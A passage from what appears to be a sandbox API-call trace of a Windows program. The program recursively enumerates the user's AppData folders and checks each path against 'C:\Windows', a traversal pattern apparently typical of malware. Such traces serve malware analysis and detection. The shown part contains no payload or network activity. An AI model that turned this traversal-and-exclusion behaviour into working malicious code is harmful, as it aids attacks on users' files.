hFindFile=0x6c4268, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa173f900, ftCreationTime.dwHighDateTime=0x1c747ea, ftLastAccessTime.dwLowDateTime=0x6d2e6230, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xa173f900, ftLastWriteTime.dwHighDateTime=0x1c747ea, nFileSizeHigh=0x0, nFileSizeLow=0x10d7, dwReserved0=0x0, dwReserved1=0x0, cFileName="Slate.css", cAlternateFileName="")) returned 1 [0049.527] FindNextFileW (in: hFindFile=0x6c42a8, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeedaa970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeedaa970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.527] FindNextFileW (in: hFindFile=0x6c42a8, lpFindFileData=0x2f2f094 | out: lpFindFileData=0x2f2f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66ac4100, ftCreationTime.dwHighDateTime=0x1c9db19, ftLastAccessTime.dwLowDateTime=0xeedaa970, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x66ac4100, ftLastWriteTime.dwHighDateTime=0x1c9db19, nFileSizeHigh=0x0, nFileSizeLow=0x4940, dwReserved0=0x0, dwReserved1=0x0, cFileName="hxdsui.dll", cAlternateFileName="")) returned 1 [0052.275] FindNextFileW (in: hFindFile=0x6c40e8, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8012b5d2, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6341730, ftLastAccessTime.dwHighDateTime=0x1d53e5f, ftLastWriteTime.dwLowDateTime=0x6341730, ftLastWriteTime.dwHighDateTime=0x1d53e5f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.275] FindNextFileW (in: hFindFile=0x6c40e8, lpFindFileData=0x2f2f808 | out: lpFindFileData=0x2f2f808*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0052.276] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f58c | out: lpFindFileData=0x2f2f58c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eab37af, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x229eba17, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eab37af, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.276] FindNextFileW (in: hFindFile=0x6c4068, lpFindFileData=0x2f2f58c | out: lpFindFileData=0x2f2f58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1193665a, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x11c7e240, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1193665a, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x800, dwReserved0=0x0, dwReserved1=0x0, cFileName="sbdrop.dll.mui", cAlternateFileName="")) returned 1 [0055.471] FindNextFileW (in: hFindFile=0x6c4568, lpFindFileData=0x2f2df30 | out: lpFindFileData=0x2f2df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x82896f70, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82899680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x82899680, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0055.472] FindNextFileW (in: hFindFile=0x6c4568, lpFindFileData=0x2f2df30 | out: lpFindFileData=0x2f2df30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x82899680, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x82899680, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xaae46e00, ftLastWriteTime.dwHighDateTime=0x1cec2fb, nFileSizeHigh=0x0, nFileSizeLow=0x6cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="craw_window.css", cAlternateFileName="CRAW_W~1.CSS")) returned 1 [0057.586] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.617] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeab70f70, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeab70f70, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeab70f70, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.620] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.620] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x40170e8 | out: hHeap=0x5d0000) returned 1 [0057.621] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="brz", cAlternateFileName="")) returned 1 [0057.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\brz\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.621] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.621] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec6bf330, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.621] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.621] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.621] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dan", cAlternateFileName="")) returned 1 [0057.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned 105 [0057.622] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned 1 [0057.622] lstrlenW (lpString="dan") returned 3 [0057.622] lstrcmpiW (lpString1="C:\\Windows", lpString2="dan") returned -1 [0057.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan") returned 105 [0057.622] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dan\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.622] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.622] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb4758f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb4758f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb4758f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.622] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.622] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.622] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="dut", cAlternateFileName="")) returned 1 [0057.622] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned 105 [0057.622] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned 1 [0057.622] lstrlenW (lpString="dut") returned 3 [0057.622] lstrcmpiW (lpString1="C:\\Windows", lpString2="dut") returned -1 [0057.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut") returned 105 [0057.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\dut\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.623] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.623] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xebdabf50, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xebdabf50, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xebdabf50, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.623] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.623] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.623] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="eng", cAlternateFileName="")) returned 1 [0057.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned 105 [0057.623] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned 1 [0057.623] lstrlenW (lpString="eng") returned 3 [0057.623] lstrcmpiW (lpString1="C:\\Windows", lpString2="eng") returned -1 [0057.623] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.623] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng") returned 105 [0057.623] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\eng\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.623] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.623] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.623] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.623] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.623] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="frn", cAlternateFileName="")) returned 1 [0057.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned 105 [0057.624] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned 1 [0057.624] lstrlenW (lpString="frn") returned 3 [0057.624] lstrcmpiW (lpString1="C:\\Windows", lpString2="frn") returned -1 [0057.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn") returned 105 [0057.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.624] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.624] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.624] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.624] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.624] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="grm", cAlternateFileName="")) returned 1 [0057.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned 105 [0057.624] lstrcmpiW (lpString1="C:\\Windows", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned 1 [0057.624] lstrlenW (lpString="grm") returned 3 [0057.624] lstrcmpiW (lpString1="C:\\Windows", lpString2="grm") returned -1 [0057.624] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x3fe70d0 [0057.624] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm") returned 105 [0057.624] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6c4228 [0057.625] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0057.625] FindNextFileW (in: hFindFile=0x6c4228, lpFindFileData=0x2f2e6a4 | out: lpFindFileData=0x2f2e6a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0057.625] FindClose (in: hFindFile=0x6c4228 | out: hFindFile=0x6c4228) returned 1 [0057.625] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fe70d0 | out: hHeap=0x5d0000) returned 1 [0057.625] FindNextFileW (in: hFindFile=0x6c42e8, lpFindFileData=0x2f2e920 | out: lpFindFileData=0x2f2e920*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="itl", cAlternateFileName="")) returned 1 [0057.625] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS 